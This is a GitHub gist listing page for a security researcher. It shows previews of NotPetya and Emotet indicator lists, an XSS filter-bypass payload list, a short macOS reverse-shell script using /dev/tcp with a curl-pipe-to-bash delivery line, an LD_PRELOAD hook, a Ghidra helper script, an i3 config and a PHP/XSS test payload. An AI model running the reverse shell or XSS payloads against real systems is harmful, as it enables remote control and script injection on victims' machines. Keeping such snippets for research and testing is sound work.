I hereby claim:
- I am mellow-hype on github.
- I am hypr_ (https://keybase.io/hypr_) on keybase.
- I have a public key ASDSUedGZsdyUfNKlI43aucXBBGNb-xvb5m8NrEpXi1RuQo
To claim this, I am signing this object:
hyper mellow-hype
mellow-hype
/ NotPetya_indicators.txt
Last active
July 4, 2017 11:52
Petya ransomware potential IOCs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| **IPs** | |
| 84.200.16.242 | |
| 111.90.139.247 | |
| 185.165.29.78 | |
| 95.141.115.108 | |
| **filenames** | |
| myguy.xls | |
| myguy.exe | |
| carved_0.xls |
mellow-hype
/ emotet_dropper_maldocs_ioc.txt
Created
August 22, 2017 06:02
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Dropper URIs: | |
| hxxp://atitmedia.com/RIVTDJLDUW6513072/ | |
| hxxps://clickonchris.com/Invoice-434244/ | |
| IOC: | |
| hxxp://ohleronline.com/ | |
| hxxp://olsondesign.com.au | |
| Hashes | |
| 191f9916be26e478d86a28aeddd88f8ed8e31f97 |
mellow-hype
/ xxsfilterbypass.lst
Created
August 4, 2018 00:44
— forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| '';!--"<XSS>=&{()} | |
| 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
| <script/src=data:,alert()> | |
| <marquee/onstart=alert()> | |
| <video/poster/onerror=alert()> | |
| <isindex/autofocus/onfocus=alert()> | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
| <IMG SRC="javascript:alert('XSS');"> | |
| <IMG SRC=javascript:alert('XSS')> |
mellow-hype
/ osx-reverse-shell.sh
Last active
January 8, 2019 19:18
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| # attacker listens using `nc -nvl 8080` | |
| # `curl -Ls https://git.io/fhZJy | bash -s <attacker-ip> 80` on victim | |
| attacker_ip=$1 | |
| attacker_port=$2 | |
| exec 5<>/dev/tcp/$attacker_ip/$attacker_port | |
| cat <&5 | while read line; do $line 2>&5 >&5; done |
mellow-hype
/ poc2.c
Last active
July 13, 2019 23:24
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define _GNU_SOURCE | |
| #include <errno.h> | |
| #include <fcntl.h> | |
| #include <stdarg.h> | |
| #include <stdbool.h> | |
| #include <stddef.h> | |
| #include <stdint.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> |
mellow-hype
/ hax.c
Created
March 12, 2022 04:07
— forked from apsun/hax.c
Hook main() using LD_PRELOAD
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * Hook main() using LD_PRELOAD, because why not? | |
| * Obviously, this code is not portable. Use at your own risk. | |
| * | |
| * Compile using 'gcc hax.c -o hax.so -fPIC -shared -ldl' | |
| * Then run your program as 'LD_PRELOAD=$PWD/hax.so ./a.out' | |
| */ | |
| #define _GNU_SOURCE | |
| #include <stdio.h> |
mellow-hype
/ symgrep.sh
Created
July 5, 2022 06:23
grep for specific strings in ghidra decompiler from the commandline
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| # -- search for specific strings in the output of ghidra decompiler for a | |
| # -- specific target binary. | |
| # -- | |
| # -- ghidra script from: https://github.com/0xdea/ghidra-scripts | |
| # --------------------------------------------------------------------------- | |
| # update this to point to the location where ghidra is installed | |
| GHIDRA_PATH="$HOME/tools/ghidra_10.1.4" | |
| # update this to point to the location where the ghidra-scripts repo was downloaded |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # i3 config file (v4) | |
| # | |
| # Please see https://i3wm.org/docs/userguide.html for a complete reference! | |
| set $mod Mod4 | |
| # Font for window titles. Will also be used by the bar unless a different font | |
| # is used in the bar {} block below. | |
| font pango:monospace 8 |
mellow-hype
/ keybase.md
Created
December 28, 2023 22:12
mellow-hype
/ gist:149ca9c6778c0b4932d3dfe85fd6656d
Last active
November 13, 2024 06:24
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Content-Type: application/html | |
| X-Other-Header: HYPRDUDE | |
| <?php phpinfo(); /><html><script>alert(1)</script></html> |